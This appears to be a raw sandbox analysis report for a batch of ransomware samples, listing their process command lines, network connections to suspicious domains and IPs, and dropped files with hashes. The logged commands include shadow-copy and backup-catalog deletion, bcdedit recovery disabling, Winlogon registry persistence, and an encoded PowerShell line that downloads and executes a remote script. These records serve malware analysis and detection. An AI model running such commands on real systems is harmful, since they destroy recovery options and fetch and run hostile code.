"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.gen-57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe
HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Crypmod.gen-44f0b6ee096aeb62aa585a0c37decaae0177eae22c18e40b0e823d9eaf856b78.exe
HEUR-Trojan-Ransom.Win32.Crypmod.gen-44f0b6ee096aeb62aa585a0c37decaae0177eae22c18e40b0e823d9eaf856b78.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-6c64967a5a1bc4c23f94bcca28f8432df1691ebd1c82dda5a55af98b28c7473c.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-6c64967a5a1bc4c23f94bcca28f8432df1691ebd1c82dda5a55af98b28c7473c.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f910502662909f3a1f4565a02d76f5e2b41e3c8f50c87cffba2dc554f18d6fb2.exe
HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f910502662909f3a1f4565a02d76f5e2b41e3c8f50c87cffba2dc554f18d6fb2.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Cryptor.gen-bd88d415032eb24091c352fc0732b31116f44a78d9333037bd7608289608d3cd.exe
HEUR-Trojan-Ransom.Win32.Cryptor.gen-bd88d415032eb24091c352fc0732b31116f44a78d9333037bd7608289608d3cd.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Encoder.gen-10b47927e604f0f0f8ac54c0ed2afcdfb6a25e47b4305a1f66d9e74e65d59f11.exe
HEUR-Trojan-Ransom.Win32.Encoder.gen-10b47927e604f0f0f8ac54c0ed2afcdfb6a25e47b4305a1f66d9e74e65d59f11.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Encoder.gen-90aef1f9699429468854159767b2278891c931d9ceb3566b80d20d1b36678ccf.exe
HEUR-Trojan-Ransom.Win32.Encoder.gen-90aef1f9699429468854159767b2278891c931d9ceb3566b80d20d1b36678ccf.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-dd5069aae36220f626dfebd4656d40543b978c6f6ec6910004f5115f0121a4c3.exe
HEUR-Trojan-Ransom.Win32.GandCrypt.pef-dd5069aae36220f626dfebd4656d40543b978c6f6ec6910004f5115f0121a4c3.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5016 -ip 5016
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscript:msgbox("升级前请确认已经重启过电脑,辅助也已经退出,如遇升级失败,请重启电脑后再操作一次 @A神优化 简单好用",64,"A神优化")(window.close)
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Generic-13b27fe50d1a3dfaccc45fc80c4eaa4e1ec4ba16486266be1470b35d85ccd905.exe
HEUR-Trojan-Ransom.Win32.Generic-13b27fe50d1a3dfaccc45fc80c4eaa4e1ec4ba16486266be1470b35d85ccd905.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 396
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\2e5a1121-e777-444f-89f1-76f96316f33c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
"C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe
"C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\00468\HEUR-T~1.BAT
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\0c0eb7f1c6274d159d14142884003170 /t 3988 /p 3508
C:\Users\Admin\AppData\Roaming\MAINPROC.exe
"C:\Users\Admin\AppData\Roaming\MAINPROC.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMgAzADcANwA1ADUANQA3ADIAOQAwADYAMwA5ADgANwAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
"C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\68dcb19b35bc419aa77d29a2e89b46f4 /t 3988 /p 3508
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\1ae9b430f78942068775340e908062a4 /t 8160 /p 8156
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\SystemID\PersonalID.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 68.204.58.216.in-addr.arpa | udp |
| US | 107.152.99.41:54893 | tcp | |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | outlook.com | udp |
| US | 8.8.8.8:53 | frenchprotector.cf | udp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 244.244.23.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | www.faresgames.com | udp |
| US | 3.94.41.167:443 | www.faresgames.com | tcp |
| GB | 172.217.169.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | meubackup.terra.com.br | udp |
| N/A | 127.0.0.1:8989 | tcp | |
| US | 107.152.99.41:54893 | tcp | |
| US | 8.8.8.8:53 | securebiz.org | udp |
| US | 8.8.8.8:53 | astdg.top | udp |
| US | 8.8.8.8:53 | astdg.top | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 52.86.6.113:443 | www.faresgames.com | tcp |
| US | 8.8.8.8:53 | astdg.top | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | meubackup.terra.com.br | udp |
| US | 8.8.8.8:53 | astdg.top | udp |
| US | 44.214.71.248:443 | meubackup.terra.com.br | tcp |
| US | 8.8.8.8:53 | 248.71.214.44.in-addr.arpa | udp |
| US | 107.152.99.41:54893 | tcp | |
| US | 3.94.41.167:443 | www.faresgames.com | tcp |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
| US | 107.152.99.41:54893 | tcp | |
| GB | 92.123.128.139:443 | www.bing.com | tcp |
| US | 107.152.99.41:54893 | tcp | |
| US | 8.8.8.8:53 | 139.128.123.92.in-addr.arpa | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 92.123.128.188:443 | www.bing.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 92.123.128.188:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 188.128.123.92.in-addr.arpa | udp |
| US | 107.152.99.41:54893 | tcp | |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.189:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 189.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.251.213.23.in-addr.arpa | udp |
| NL | 51.158.146.58:443 | tcp | |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 58.146.158.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.219.218.216.in-addr.arpa | udp |
| US | 107.152.99.41:54893 | tcp | |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 107.152.99.41:54893 | tcp | |
| SE | 129.151.202.36:9019 | tcp | |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 36.202.151.129.in-addr.arpa | udp |
| US | 107.152.99.41:54893 | tcp |
Files
memory/1916-158-0x0000023DC3910000-0x0000023DC3932000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sf1qyg12.vpd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1916-168-0x0000023DC39B0000-0x0000023DC39F4000-memory.dmp
memory/1916-169-0x0000023DC5F50000-0x0000023DC5FC6000-memory.dmp
memory/1344-170-0x00000267B9220000-0x00000267B9221000-memory.dmp
memory/1344-171-0x00000267B9220000-0x00000267B9221000-memory.dmp
memory/1344-172-0x00000267B9220000-0x00000267B9221000-memory.dmp
memory/1344-181-0x00000267B9220000-0x00000267B9221000-memory.dmp
memory/1344-180-0x00000267B9220000-0x00000267B9221000-memory.dmp
memory/1344-179-0x00000267B9220000-0x00000267B9221000-memory.dmp
memory/1344-178-0x00000267B9220000-0x00000267B9221000-memory.dmp
memory/1344-177-0x00000267B9220000-0x00000267B9221000-memory.dmp
memory/1344-182-0x00000267B9220000-0x00000267B9221000-memory.dmp
memory/1344-176-0x00000267B9220000-0x00000267B9221000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | 6bd369f7c74a28194c991ed1404da30f |
| SHA1 | 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643 |
| SHA256 | 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d |
| SHA512 | 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | d2fb266b97caff2086bf0fa74eddb6b2 |
| SHA1 | 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d |
| SHA256 | b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a |
| SHA512 | c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
memory/1916-199-0x0000023DC5F10000-0x0000023DC5F2E000-memory.dmp
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe
| MD5 | deb8f4311fd52319f6168c10b626c808 |
| SHA1 | f4807d71a1048d05815a09b74997f338e26ba9ff |
| SHA256 | 1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053 |
| SHA512 | ecb2c2630b03a07f20e993722ef9f55f5369d11afa21bec3dab59f65867849fb3596e4d3707730d2d75acd5d62e98afb1c06f2e7a80cd4f5946b51867bed9685 |
memory/1152-210-0x00000000004F0000-0x0000000000506000-memory.dmp
memory/4352-209-0x00000000007C0000-0x000000000085E000-memory.dmp
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe
| MD5 | 1e175bf4ba4793a382da7167ddbf074f |
| SHA1 | c461df9cfc14dc79d0e9485f1fe44fd6253e091a |
| SHA256 | a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8 |
| SHA512 | cb468afb985d31506e03cd90d05378dbfbe466651db2e0407918eaccaca19c61294dc68f08d17e9c8cf63d7cd05e1fb6b1fad580a17e2c2899a32174dffec0ed |
memory/740-214-0x0000000000080000-0x0000000000092000-memory.dmp
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe
| MD5 | 9eb958c38bd3d39c55b009f9a200f42f |
| SHA1 | b5ab794dd5821d08f7ecd860ba7975a6644dd46d |
| SHA256 | b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956 |
| SHA512 | f7146fa64c8fe89eb4afb29af0b85e1693a03aeb38ae2948b8c047b4f1dd84817954563b6bd5ead4c4461242e1275c47ef4b41cf33fe9e3899dfe3952bc46954 |
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d.exe
| MD5 | e21b3b2da765eac6dd83d89682877b49 |
| SHA1 | 3fb51724f9e5b9ef940a9354f83a391e354a1ea6 |
| SHA256 | a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d |
| SHA512 | d88ebefa0cf537ea6ad975e008c5a336699ef484f2b6d44fece02a2c25d98e5bb59d260f2064f67b4e25d256e2b1fe46ed7b73353bb02c67a345e1495f4738e6 |
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e.exe
| MD5 | 5d6d98d0ed873da0eaa560212c32dfd8 |
| SHA1 | e0f055ea9c663d202915b54540d09a4e0daf82a2 |
| SHA256 | a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e |
| SHA512 | 0b31e99eba600067682fab42e07ef8c836f8ef521acfbe1032f184701c2791a4bb0a94364ce962efd7732fa089142383d11788b82a4f006e43590115a3925cbc |
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe
| MD5 | cd22822f28e387ba075f39c23fb024ab |
| SHA1 | ddb7169a61706d69486dc19fc33f4a217eabc505 |
| SHA256 | c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f |
| SHA512 | 45f6c2d5585f0b6f64f0f7d874f92d70dac2d724932f8c60827ebe5d7a831ac0e3a9d48edf700ac8ca27697f9c4b222ac27ce49ab17f694cad702d7fed4e772e |
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe
| MD5 | 3b17aa91d84b96c1712f3106e958db03 |
| SHA1 | 7c0d1d97a36fa8604878f98bb55cffc9707171de |
| SHA256 | d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b |
| SHA512 | c3c4b8666024005d29be76cef967257632e18aa7cd4fa57ab3170de0ccfbe5978cb687f728e5ecef7392694f182ab430610defb4eaf2d88ef059856232367c96 |
memory/2808-227-0x0000000000510000-0x0000000000544000-memory.dmp
memory/3584-229-0x000000001C2A0000-0x000000001C76E000-memory.dmp
memory/672-230-0x0000000000970000-0x0000000000B30000-memory.dmp
memory/2808-228-0x0000000004DA0000-0x0000000004E3C000-memory.dmp
memory/3584-236-0x000000001C890000-0x000000001C8F2000-memory.dmp
memory/2808-234-0x0000000004F50000-0x0000000004FE2000-memory.dmp
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
| MD5 | fb55b405501121708ec66dec20a83953 |
| SHA1 | 6d4fbfbaf6ff14d83f835c31a7ea2708cf760e14 |
| SHA256 | f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003 |
| SHA512 | 9fdb97a2558246f7f3760f4168db913fd0acc352193f7263d75d31ac422647b24059794b1956fe21d397f477380b686620b3d4411958939fa715b291a02c8bb1 |
memory/4180-238-0x00000000001E0000-0x00000000002AE000-memory.dmp
memory/3584-233-0x000000001C770000-0x000000001C816000-memory.dmp
memory/2808-232-0x0000000005460000-0x0000000005A04000-memory.dmp
memory/2808-240-0x0000000004FF0000-0x0000000005046000-memory.dmp
memory/2808-239-0x0000000004E80000-0x0000000004E8A000-memory.dmp
memory/2808-241-0x0000000005BC0000-0x0000000005D66000-memory.dmp
memory/3508-245-0x000001F462B90000-0x000001F463880000-memory.dmp
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Gen.gen-ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123.exe
| MD5 | a4877a3227291745c13b74e05597c355 |
| SHA1 | 2091f687ee2dd53113542a4b9438a3dc1b26cd84 |
| SHA256 | ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123 |
| SHA512 | af76ea99fa88b4c5bee500808c2803cd282c1d4fc9e5d0164163652aa4f80e3f6b8e654febfd835cdcbbbf7cfc7d7bdd02095f72072740c3820cd140da9be466 |
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
| MD5 | 078265af9fd10064a23cac405a144677 |
| SHA1 | a94acc3a65654dc9583c927b357ce096bf207606 |
| SHA256 | d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918 |
| SHA512 | a177e3ef3c126b41dddede3e9dc0e6df748215447a018d97bacdb0191e7a46149bb6d7f9fc49a088588fe77be0637130502497f8cf64abd45ef0d13015bdb147 |
memory/3508-304-0x000001F47DC80000-0x000001F47DCF6000-memory.dmp
memory/3508-293-0x000001F47DE50000-0x000001F47E5D6000-memory.dmp
memory/3508-359-0x000001F400060000-0x000001F40009A000-memory.dmp
memory/3508-360-0x000001F4008D0000-0x000001F400950000-memory.dmp
memory/3508-390-0x000001F400BA0000-0x000001F400C30000-memory.dmp
memory/3508-380-0x000001F400B50000-0x000001F400B9A000-memory.dmp
memory/3508-358-0x000001F400040000-0x000001F400058000-memory.dmp
memory/3508-348-0x000001F400810000-0x000001F4008CC000-memory.dmp
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.gen-57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05.exe
| MD5 | 652ba7e19b0874c59384c1f3c8f803f8 |
| SHA1 | 7fe145ce24ae06d5508b438026c21b9e23669e18 |
| SHA256 | 57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05 |
| SHA512 | e505abf45a25bef294683d0434be51459133957c558591606bd6319937be2e10c14d99878fecd3d977b5e865a838ef101eb57f26d227d63d3bd60c6de4f4b691 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | a26df49623eff12a70a93f649776dab7 |
| SHA1 | efb53bd0df3ac34bd119adf8788127ad57e53803 |
| SHA256 | 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245 |
| SHA512 | e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c |
memory/5716-905-0x0000000002020000-0x000000000203C000-memory.dmp
memory/5716-978-0x00000000023F0000-0x000000000240A000-memory.dmp
memory/3584-1050-0x000000001D0B0000-0x000000001D14C000-memory.dmp
memory/5716-1049-0x0000000005070000-0x00000000050D6000-memory.dmp
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe
| MD5 | 027df9ea670fd833df0622169548f40b |
| SHA1 | d715ba18df48c1bbab957cc9e01c8e30306977ec |
| SHA256 | a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f |
| SHA512 | 60b0154a21c619c0fccb3b52b227d03f550569315c173723c0ad81e3ab24bb4800814473ae7f26cf02a5a7c5b89ffed668585ee527cf9030e038898c7ef9f373 |
memory/5928-1290-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18202\python39.dll
| MD5 | 2a9c5db70c6906571f2ca3a07521baa2 |
| SHA1 | 765fa27bbee6a02b20b14b2b78c92a880e6627e5 |
| SHA256 | c69ce89b0487d86a63b64951207781f8051282afde67b20d3b8374c1a067f611 |
| SHA512 | fa4a677eaae2d258ac4f083a4e7009d985523b964ada93f53dc399a88c14970c7be2d2f39a7b38a922b58d134df2ede954554dcd00a4895e4273161867acac53 |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\libffi-7.dll
| MD5 | bc20614744ebf4c2b8acd28d1fe54174 |
| SHA1 | 665c0acc404e13a69800fae94efd69a41bdda901 |
| SHA256 | 0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57 |
| SHA512 | 0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b |
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
| MD5 | a4e326edfb5c14337c348ea156e08cef |
| SHA1 | 8d798dda9fc662a5904003946c7d926c7ea7c221 |
| SHA256 | 8c2cc065a557828ba632feaa1e6165b1a7e434291d4a48ebb513dbc7b27b8f20 |
| SHA512 | 837431acbb9891a0bb2d6b7500c2404929a6c7a7218b42fde4762e50fc41b8dbe50028e4b857ac2812a3ed87f8141427358445c919c7d82c1e053bbb85d3884e |
C:\Users\Admin\AppData\Local\Temp\_MEI18202\select.pyd
